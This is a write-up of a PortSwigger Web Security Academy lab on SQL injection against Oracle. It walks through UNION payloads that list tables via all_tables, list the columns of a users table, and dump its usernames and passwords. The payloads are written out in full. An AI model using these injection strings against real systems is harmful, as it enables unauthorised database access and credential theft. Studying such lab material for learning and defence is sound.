Write-up: SQL injection attack, listing the database contents on Oracle @ PortSwigger Academy
This write-up for the lab SQL injection attack, listing the database contents on Oracle is part of my walkthrough series for PortSwigger’s Web Security Academy.
Learning path: Server-side topics → SQL injection
Python script: script.py
Lab description
Query
The query used in the lab will look something like
SELECT * FROM someTable WHERE category = '<CATEGORY>'
Steps
The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
Find users table
The database in use here is Oracle, which holds the table information in the all_tables
-table. In the relevant documentation, the available columns are listed.
I am interested in table_name
. So I inject ' UNION SELECT table_name, null from all_tables--
into the parameter to form the following query:
I also select an invalid category so that only my output appears.
SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from all_tables--'`
Enumerate columns in this table
The all_tab_columns-table holds information about the columns of each table, specifically the column_name
column. The proper string to inject is ' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--
to form this query
SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--'`
Enumerate all usernames and passwords
Now I have all information to obtain the required usernames and passwords. I inject ' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--
to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--'`
The last step is to simply log in to solve this exercise.
Originally published at https://github.com.